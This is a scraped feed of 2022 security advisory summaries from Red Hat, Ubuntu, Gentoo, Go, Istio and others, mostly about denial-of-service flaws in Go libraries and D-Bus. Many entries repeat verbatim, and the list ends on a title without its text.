Ubuntu Security Notice 5704-1 - It was discovered that DBus incorrectly handled messages with invalid type signatures. A local attacker could possibly use this issue to cause DBus to crash, resulting in a denial of service. It was discovered that DBus was incorrectly validating the length of arrays of fixed-length items. A local attacker could possibly use this issue to cause DBus to crash, resulting in a denial of service. It was discovered that DBus incorrectly handled the body DBus message with attached file descriptors. A local attacker could possibly use this issue to cause DBus to crash, resulting in a denial of service.

Ubuntu Security Notice USN-5704-1

Ubuntu Security Notice 5704-1 - It was discovered that DBus incorrectly handled messages with invalid type signatures. A local attacker could possibly use this issue to cause DBus to crash, resulting in a denial of service. It was discovered that DBus was incorrectly validating the length of arrays of fixed-length items. A local attacker could possibly use this issue to cause DBus to crash, resulting in a denial of service. It was discovered that DBus incorrectly handled the body DBus message with attached file descriptors. A local attacker could possibly use this issue to cause DBus to crash, resulting in a denial of service.

Red Hat Security Advisory 2022-7129-01

Red Hat Security Advisory 2022-7129-01 - Git Large File Storage replaces large files such as audio samples, videos, datasets, and graphics with text pointers inside Git, while storing the file contents on a remote server. Issues addressed include a denial of service vulnerability.

RHSA-2022:7129: Red Hat Security Advisory: git-lfs security and bug fix update

An update for git-lfs is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2020-28851: golang.org/x/text: Panic in language.ParseAcceptLanguage while parsing -u- extension * CVE-2020-28852: golang.org/x/text: Panic in language.ParseAcceptLanguage while processing bcp47 tag * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-27664: golang: net/http: handle server errors after sending GOAWA...

RHSA-2022:7129: Red Hat Security Advisory: git-lfs security and bug fix update

An update for git-lfs is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2020-28851: golang.org/x/text: Panic in language.ParseAcceptLanguage while parsing -u- extension * CVE-2020-28852: golang.org/x/text: Panic in language.ParseAcceptLanguage while processing bcp47 tag * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-27664: golang: net/http: handle server errors after sending GOAWA...

CVE-2022-41715: [security] Go 1.19.2 and Go 1.18.7 are released

Programs which compile regular expressions from untrusted sources may be vulnerable to memory exhaustion or denial of service. The parsed regexp representation is linear in the size of the input, but in some cases the constant factor can be as high as 40,000, making relatively small regexps consume much larger amounts of memory. After fix, each regexp being parsed is limited to a 256 MB memory footprint. Regular expressions whose representation would use more space than that are rejected. Normal use of regular expressions is unaffected.

CVE-2022-41715: [security] Go 1.19.2 and Go 1.18.7 are released

Programs which compile regular expressions from untrusted sources may be vulnerable to memory exhaustion or denial of service. The parsed regexp representation is linear in the size of the input, but in some cases the constant factor can be as high as 40,000, making relatively small regexps consume much larger amounts of memory. After fix, each regexp being parsed is limited to a 256 MB memory footprint. Regular expressions whose representation would use more space than that are rejected. Normal use of regular expressions is unaffected.

CVE-2022-41715: [security] Go 1.19.2 and Go 1.18.7 are released

Programs which compile regular expressions from untrusted sources may be vulnerable to memory exhaustion or denial of service. The parsed regexp representation is linear in the size of the input, but in some cases the constant factor can be as high as 40,000, making relatively small regexps consume much larger amounts of memory. After fix, each regexp being parsed is limited to a 256 MB memory footprint. Regular expressions whose representation would use more space than that are rejected. Normal use of regular expressions is unaffected.

CVE-2022-2880: net/http/httputil: ReverseProxy should not forward unparseable query parameters · Issue #54663 · golang/go

Requests forwarded by ReverseProxy include the raw query parameters from the inbound request, including unparseable parameters rejected by net/http. This could permit query parameter smuggling when a Go proxy forwards a parameter with an unparseable value. After fix, ReverseProxy sanitizes the query parameters in the forwarded query when the outbound request's Form field is set after the ReverseProxy. Director function returns, indicating that the proxy has parsed the query parameters. Proxies which do not parse query parameters continue to forward the original query parameters unchanged.

CVE-2022-2879: archive/tar: unbounded memory consumption when reading headers · Issue #54853 · golang/go

Reader.Read does not set a limit on the maximum size of file headers. A maliciously crafted archive could cause Read to allocate unbounded amounts of memory, potentially causing resource exhaustion or panics. After fix, Reader.Read limits the maximum size of header blocks to 1 MiB.

CVE-2022-39278: Announcing Istio 1.13.9

Istio is an open platform-independent service mesh that provides traffic management, policy enforcement, and telemetry collection. Prior to versions 1.15.2, 1.14.5, and 1.13.9, the Istio control plane, istiod, is vulnerable to a request processing error, allowing a malicious attacker that sends a specially crafted or oversized message which results in the control plane crashing when the Kubernetes validating or mutating webhook service is exposed publicly. This endpoint is served over TLS port 15017, but does not require any authentication from the attacker. For simple installations, Istiod is typically only reachable from within the cluster, limiting the blast radius. However, for some deployments, especially external istiod topologies, this port is exposed over the public internet. Versions 1.15.2, 1.14.5, and 1.13.9 contain patches for this issue. There are no effective workarounds, beyond upgrading. This bug is due to an error in `regexp.Compile` in Go.

CVE-2022-41316: HCSEC-2022-24 - Vault's TLS Cert Auth Method Only Loaded CRL After First Request

HashiCorp Vault and Vault Enterprise’s TLS certificate auth method did not initially load the optionally configured CRL issued by the role's CA into memory on startup, resulting in the revocation list not being checked if the CRL has not yet been retrieved. Fixed in 1.12.0, 1.11.4, 1.10.7, and 1.9.10.

CVE-2022-42012: security - dbus denial of service: CVE-2022-42010, -42011, -42012

An issue was discovered in D-Bus before 1.12.24, 1.13.x and 1.14.x before 1.14.4, and 1.15.x before 1.15.2. An authenticated attacker can cause dbus-daemon and other programs that use libdbus to crash by sending a message with attached file descriptors in an unexpected format.

CVE-2022-42012: security - dbus denial of service: CVE-2022-42010, -42011, -42012

An issue was discovered in D-Bus before 1.12.24, 1.13.x and 1.14.x before 1.14.4, and 1.15.x before 1.15.2. An authenticated attacker can cause dbus-daemon and other programs that use libdbus to crash by sending a message with attached file descriptors in an unexpected format.

CVE-2022-42012: security - dbus denial of service: CVE-2022-42010, -42011, -42012

An issue was discovered in D-Bus before 1.12.24, 1.13.x and 1.14.x before 1.14.4, and 1.15.x before 1.15.2. An authenticated attacker can cause dbus-daemon and other programs that use libdbus to crash by sending a message with attached file descriptors in an unexpected format.

Gentoo Linux Security Advisory 202209-26

Gentoo Linux Security Advisory 202209-26 - Multiple vulnerabilities have been discovered in Go, the worst of which could result in denial of service. Versions less than 1.18.6 are affected.

Gentoo Linux Security Advisory 202209-26

Gentoo Linux Security Advisory 202209-26 - Multiple vulnerabilities have been discovered in Go, the worst of which could result in denial of service. Versions less than 1.18.6 are affected.

Red Hat Security Advisory 2022-6714-01

Red Hat Security Advisory 2022-6714-01 - Updated images are now available for Red Hat Advanced Cluster Security for Kubernetes (RHACS). The updated image includes new features and bug fixes.

Red Hat Security Advisory 2022-6560-01

Red Hat Security Advisory 2022-6560-01 - An update is now available for OpenShift Logging 5.3.12 Red Hat Product Security has rated this update as having a security impact of Moderate.

RHSA-2022:6560: Red Hat Security Advisory: Openshift Logging Bug Fix Release and Security Update (5.3.12)

An update is now available for OpenShift Logging 5.3.12 Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-30631: golang: compress/gzip: stack exhaustion in Reader.Read

GHSA-phjr-8j92-w5v7: CRI-O incorrect handling of supplementary groups may lead to sensitive information disclosure

Incorrect handling of the supplementary groups in the CRI-O container engine might lead to sensitive information disclosure or possible data modification if an attacker has direct access to the affected container where supplementary groups are used to set access permissions and is able to execute a binary code in that container.

Red Hat Security Advisory 2022-6527-01

Red Hat Security Advisory 2022-6527-01 - OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform. This advisory contains OpenShift Virtualization 4.11.0 RPMs.

RHSA-2022:6526: Red Hat Security Advisory: OpenShift Virtualization 4.11.0 Images security and bug fix update

Red Hat OpenShift Virtualization release 4.11.0 is now available with updates to packages and images that fix several bugs and add enhancements. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS * CVE-2021-44716: golang: net/http: limit growth of header canonicalization cache * CVE-2021-44717: golang: syscall: don't close fd 0 on ForkExec error * CVE-2022-1798: kubeVirt: Arbitrary file read on t...

CVE-2022-32190

JoinPath and URL.JoinPath do not remove ../ path elements appended to a relative path. For example, JoinPath("https://go.dev", "../go") returns the URL "https://go.dev/../go", despite the JoinPath documentation stating that ../ path elements are removed from the result.

CVE-2022-2990: Vulnerability in Linux containers – investigation and mitigation

An incorrect handling of the supplementary groups in the Buildah container engine might lead to the sensitive information disclosure or possible data modification if an attacker has direct access to the affected container where supplementary groups are used to set access permissions and is able to execute a binary code in that container.

RHSA-2022:6318: Red Hat Security Advisory: OpenShift Container Platform 4.9.48 extras security update

Red Hat OpenShift Container Platform release 4.9.48 is now available with updates to packages and images that fix several bugs. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS

RHSA-2022:6263: Red Hat Security Advisory: OpenShift Container Platform 4.6.61 security and extras update

Red Hat OpenShift Container Platform release 4.6.61 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.6. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS

RHSA-2022:6287: Red Hat Security Advisory: OpenShift Container Platform 4.11.3 packages and security update

Red Hat OpenShift Container Platform release 4.11.3 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.11. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS

Red Hat Security Advisory 2022-6345-01

Red Hat Security Advisory 2022-6345-01 - Multicluster engine for Kubernetes 2.1 images Multicluster engine for Kubernetes provides the foundational components that are necessary for the centralized management of multiple Kubernetes-based clusters across data centers, public clouds, and private clouds. You can use the engine to create new Red Hat OpenShift Container Platform clusters or to bring existing Kubernetes-based clusters under management by importing them. After the clusters are managed, you can use the APIs that are provided by the engine to distribute configuration based on placement policy. Issues addressed include a denial of service vulnerability.

Red Hat Security Advisory 2022-6345-01

Red Hat Security Advisory 2022-6345-01 - Multicluster engine for Kubernetes 2.1 images Multicluster engine for Kubernetes provides the foundational components that are necessary for the centralized management of multiple Kubernetes-based clusters across data centers, public clouds, and private clouds. You can use the engine to create new Red Hat OpenShift Container Platform clusters or to bring existing Kubernetes-based clusters under management by importing them. After the clusters are managed, you can use the APIs that are provided by the engine to distribute configuration based on placement policy. Issues addressed include a denial of service vulnerability.

Red Hat Security Advisory 2022-6347-01

Red Hat Security Advisory 2022-6347-01 - VolSync is a Kubernetes operator that enables asynchronous replication of persistent volumes within a cluster, or across clusters. Version 0.5 has been released with security fixes and updates.

RHSA-2022:6370: Red Hat Security Advisory: Red Hat Advanced Cluster Management 2.6.0 security updates and bug fixes

Red Hat Advanced Cluster Management for Kubernetes 2.6.0 General Availability release images, which fix security issues and bugs. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE links in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-1962: golang: go/parser: stack exhaustion in all Parse* functions * CVE-2022-28131: golang: encoding/xml: stack exhaustion in Decoder.Skip * CVE-2022-30629: golang: crypto/tls: session tickets lack random ticket_a...

CVE-2022-27664: [security] Go 1.19.1 and Go 1.18.6 are released

In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.

CVE-2022-27664: [security] Go 1.19.1 and Go 1.18.6 are released

In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.

RHSA-2022:6348: Red Hat Security Advisory: Gatekeeper Operator v0.2 security and container updates

Gatekeeper Operator v0.2 security updates Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-1962: golang: go/parser: stack exhaustion in all Parse* functions * CVE-2022-28131: golang: encoding/xml: stack exhaustion in Decoder.Skip * CVE-2022-30629: golang: crypto/tls: session tickets lack random ticket_age_add * CVE-2022-30630: golang: io/fs: stack exhaustion in Glob * CVE-2022-30631: gol...

RHSA-2022:6348: Red Hat Security Advisory: Gatekeeper Operator v0.2 security and container updates

Gatekeeper Operator v0.2 security updates Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-1962: golang: go/parser: stack exhaustion in all Parse* functions * CVE-2022-28131: golang: encoding/xml: stack exhaustion in Decoder.Skip * CVE-2022-30629: golang: crypto/tls: session tickets lack random ticket_age_add * CVE-2022-30630: golang: io/fs: stack exhaustion in Glob * CVE-2022-30631: gol...

RHSA-2022:6183: Red Hat Security Advisory: Logging Subsystem 5.4.5 Security and Bug Fix Update

Logging Subsystem 5.4.5 - Red Hat OpenShift Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-30631: golang: compress/gzip: stack exhaustion in Reader.Read * CVE-2022-32148: golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working

RHSA-2022:6183: Red Hat Security Advisory: Logging Subsystem 5.4.5 Security and Bug Fix Update

Logging Subsystem 5.4.5 - Red Hat OpenShift Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-30631: golang: compress/gzip: stack exhaustion in Reader.Read * CVE-2022-32148: golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working

RHSA-2022:6183: Red Hat Security Advisory: Logging Subsystem 5.4.5 Security and Bug Fix Update

Logging Subsystem 5.4.5 - Red Hat OpenShift Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-30631: golang: compress/gzip: stack exhaustion in Reader.Read * CVE-2022-32148: golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working

RHSA-2022:6346: Red Hat Security Advisory: RHSA: Submariner 0.13 - security and enhancement update

Submariner 0.13 packages that fix security issues and bugs, as well as adds various enhancements that are now available for Red Hat Advanced Cluster Management for Kubernetes version 2.6. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-1962: golang: go/parser: stack exhaustion in all Parse* functions...

Red Hat Security Advisory 2022-6290-01

Red Hat Security Advisory 2022-6290-01 - OpenShift API for Data Protection enables you to back up and restore application resources, persistent volume data, and internal container images to external backup storage. Issues addressed include a denial of service vulnerability.

RHSA-2022:6290: Red Hat Security Advisory: OpenShift API for Data Protection (OADP) 1.1.0 security and bug fix update

OpenShift API for Data Protection (OADP) 1.1.0 is now available. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-21698: prometheus/client_golang: Denial of service using InstrumentHandlerCounter * CVE-2022-24675: golang: encoding/pem: fix stack overflow in Decode * CVE-2022-28327: golang: crypto/elliptic: panic caused by oversized scalar * CVE-2022-30629: golang: crypto/tls: session tickets lack random ticket_age_add * CVE-2022-30631: golang: compress/gzip: stack exhaus...

Red Hat Security Advisory 2022-6051-01

Red Hat Security Advisory 2022-6051-01 - An update is now available for RHOL-5.5-RHEL-8. Issues addressed include denial of service, man-in-the-middle, and out of bounds read vulnerabilities.

RHSA-2022:6051: Red Hat Security Advisory: Logging Subsystem 5.5.0 - Red Hat OpenShift security update

An update is now available for RHOL-5.5-RHEL-8. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS * CVE-2022-0759: kubeclient: kubeconfig parsing error can lead to MITM attacks * CVE-2022-21698: prometheus/client_golang: Denial of service using InstrumentHandlerCounter * CVE-2022-30631: golang: compress/gzip: stack exhaustion in Reader.Read

RHSA-2022:6113: Red Hat Security Advisory: Red Hat Application Interconnect 1.0 Release (rpms)

Red Hat Application Interconnect 1.0 introduces a service network, linking TCP and HTTP services across the hybrid cloud. A service network enables communication between services running in different network locations or sites. It allows geographically distributed services to connect as if they were all running in the same site. This is an update to the rpms for Red Hat Application Interconnect 1.0 to fix some security issues in the golang compiler. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE links in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original...

RHSA-2022:6113: Red Hat Security Advisory: Red Hat Application Interconnect 1.0 Release (rpms)

Red Hat Application Interconnect 1.0 introduces a service network, linking TCP and HTTP services across the hybrid cloud. A service network enables communication between services running in different network locations or sites. It allows geographically distributed services to connect as if they were all running in the same site. This is an update to the rpms for Red Hat Application Interconnect 1.0 to fix some security issues in the golang compiler. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE links in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original...

RHSA-2022:6113: Red Hat Security Advisory: Red Hat Application Interconnect 1.0 Release (rpms)

Red Hat Application Interconnect 1.0 introduces a service network, linking TCP and HTTP services across the hybrid cloud. A service network enables communication between services running in different network locations or sites. It allows geographically distributed services to connect as if they were all running in the same site. This is an update to the rpms for Red Hat Application Interconnect 1.0 to fix some security issues in the golang compiler. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE links in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original...

CVE-2022-32148

Improper exposure of client IP addresses in net/http before Go 1.17.12 and Go 1.18.4 can be triggered by calling httputil.ReverseProxy.ServeHTTP with a Request.Header map containing a nil value for the X-Forwarded-For header, which causes ReverseProxy to set the client IP as the value of the X-Forwarded-For header.

CVE-2022-1705

Acceptance of some invalid Transfer-Encoding headers in the HTTP/1 client in net/http before Go 1.17.12 and Go 1.18.4 allows HTTP request smuggling if combined with an intermediate server that also improperly fails to reject the header as invalid.

RHSA-2022:6040: Red Hat Security Advisory: Release of OpenShift Serverless 1.24.0

Release of OpenShift Serverless 1.24.0 The References section contains CVE links providing detailed severity ratings for each vulnerability. Ratings are based on a Common Vulnerability Scoring System (CVSS) base score.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-1962: golang: go/parser: stack exhaustion in all Parse* functions * CVE-2022-1996: go-restful: Authorization Bypass Through User-Controlled Key * CVE-2022-21698: prometheus/client_golang: Denial of service using InstrumentHandlerCounter * CVE-2022-24675: golang: encoding/pem: fix stack overflow in Decode * CVE-2022-24921: golang: regexp: stack exhaustion via a deeply nested expression * C...

RHSA-2022:6040: Red Hat Security Advisory: Release of OpenShift Serverless 1.24.0

Release of OpenShift Serverless 1.24.0 The References section contains CVE links providing detailed severity ratings for each vulnerability. Ratings are based on a Common Vulnerability Scoring System (CVSS) base score.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-1962: golang: go/parser: stack exhaustion in all Parse* functions * CVE-2022-1996: go-restful: Authorization Bypass Through User-Controlled Key * CVE-2022-21698: prometheus/client_golang: Denial of service using InstrumentHandlerCounter * CVE-2022-24675: golang: encoding/pem: fix stack overflow in Decode * CVE-2022-24921: golang: regexp: stack exhaustion via a deeply nested expression * C...

RHSA-2022:6040: Red Hat Security Advisory: Release of OpenShift Serverless 1.24.0

Release of OpenShift Serverless 1.24.0 The References section contains CVE links providing detailed severity ratings for each vulnerability. Ratings are based on a Common Vulnerability Scoring System (CVSS) base score.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-1962: golang: go/parser: stack exhaustion in all Parse* functions * CVE-2022-1996: go-restful: Authorization Bypass Through User-Controlled Key * CVE-2022-21698: prometheus/client_golang: Denial of service using InstrumentHandlerCounter * CVE-2022-24675: golang: encoding/pem: fix stack overflow in Decode * CVE-2022-24921: golang: regexp: stack exhaustion via a deeply nested expression * C...

RHSA-2022:6040: Red Hat Security Advisory: Release of OpenShift Serverless 1.24.0

Release of OpenShift Serverless 1.24.0 The References section contains CVE links providing detailed severity ratings for each vulnerability. Ratings are based on a Common Vulnerability Scoring System (CVSS) base score.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-1705: golang: net/http: improper sanitization of Transfer-Encoding header * CVE-2022-1962: golang: go/parser: stack exhaustion in all Parse* functions * CVE-2022-1996: go-restful: Authorization Bypass Through User-Controlled Key * CVE-2022-21698: prometheus/client_golang: Denial of service using InstrumentHandlerCounter * CVE-2022-24675: golang: encoding/pem: fix stack overflow in Decode * CVE-2022-24921: golang: regexp: stack exhaustion via a deeply nested expression * C...

Gentoo Linux Security Advisory 202208-02

Gentoo Linux Security Advisory 202208-2 - Multiple vulnerabilities have been found in Go, the worst of which could result in remote code execution. Versions less than 1.18.5 are affected.

RHSA-2022:5525: Red Hat Security Advisory: Service Binding Operator security update

An update for service-binding-operator-bundle-container and service-binding-operator-container is now available for OpenShift Developer Tools and Services for OCP 4.7 + Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-38561: golang: out-of-bounds read in golang.org/x/text/language leads to DoS

Red Hat Security Advisory 2022-2281-01

Red Hat Security Advisory 2022-2281-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 3.11.705.

RHSA-2022:2281: Red Hat Security Advisory: OpenShift Container Platform 3.11.705 security update

Red Hat OpenShift Container Platform release 3.11.705 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 3.11. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-1677: openshift/router: route hijacking attack via crafted HAProxy configuration file

Red Hat Security Advisory 2022-4712-01

Red Hat Security Advisory 2022-4712-01 - The ovirt-engine package provides the Red Hat Virtualization Manager, a centralized management platform that allows system administrators to view and manage virtual machines. The Manager provides a comprehensive range of features including search capabilities, resource management, live migrations, and virtual infrastructure provisioning. The ovirt-ansible-hosted-engine-setup package provides an Ansible role for deploying Red Hat Virtualization Hosted-Engine.

RHSA-2022:4712: Red Hat Security Advisory: RHV Engine and Host Common Packages security update

Updated dependency packages for ovirt-engine and ovirt-host that fix several bugs and add various enhancements are now available. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2022-24302: python-paramiko: Race condition in the write_private_key_file function

Red Hat Security Advisory 2022-4668-01

Red Hat Security Advisory 2022-4668-01 - Red Hat OpenShift Virtualization release 4.10.1 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include a denial of service vulnerability.

RHSA-2022:4668: Red Hat Security Advisory: OpenShift Virtualization 4.10.1 Images security and bug fix update

